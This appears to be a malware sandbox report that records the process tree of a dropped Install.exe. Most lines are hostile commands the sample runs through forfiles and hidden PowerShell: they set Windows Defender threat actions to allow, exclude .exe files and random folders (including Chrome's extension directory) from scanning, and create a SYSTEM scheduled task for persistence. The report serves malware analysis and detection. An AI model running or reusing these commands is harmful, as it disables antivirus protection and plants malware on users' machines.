\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2364
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:920
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:1756
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2956
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:3652
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "baOmDneVXoOuKLmJPZ" /SC once /ST 23:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exe\" 4w /ocrdidnHmW 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4580
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn baOmDneVXoOuKLmJPZ"4⤵PID:4400
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn baOmDneVXoOuKLmJPZ5⤵PID:3108
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn baOmDneVXoOuKLmJPZ6⤵PID:4832
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exe 4w /ocrdidnHmW 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4676 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5008
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:3076
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2260
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:4124
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4764
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1284
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1836
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4828
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:4472
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2144
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2096
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4520
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:2788
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:3340
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:2964
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4816
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3020
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PqbaBdNutUHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PqbaBdNutUHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lExdmLMBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lExdmLMBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ruvdGviMRzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ruvdGviMRzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tcAZjUgKvOkyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tcAZjUgKvOkyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ypvfxRdiVpdIIEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ypvfxRdiVpdIIEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TtNtWPRQARDvDBvI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TtNtWPRQARDvDBvI\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:323⤵PID:4216
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:324⤵PID:4400
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:643⤵PID:512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:323⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:643⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:323⤵PID:3076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:643⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:323⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:323⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:643⤵PID:4436
-
-
